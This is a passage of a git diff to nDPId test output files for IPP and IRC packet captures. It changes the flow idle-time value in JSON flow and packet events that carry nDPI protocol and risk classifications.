-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} 
-00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} 
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} 
+00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":279,"packets-processed":277,"total-skipped-flows":0,"total-l4-data-len":230224,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1210953939492} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 279/277 diff --git a/test/results/irc.pcap.out b/test/results/irc.pcap.out index ef8a50f73..9e3fdf279 100644 --- a/test/results/irc.pcap.out +++ b/test/results/irc.pcap.out 
@@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"irc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1387554241634} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387554241634,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387554241634,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} -00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387554241634,"flow_last_seen":1387554241634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387554241634,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": 
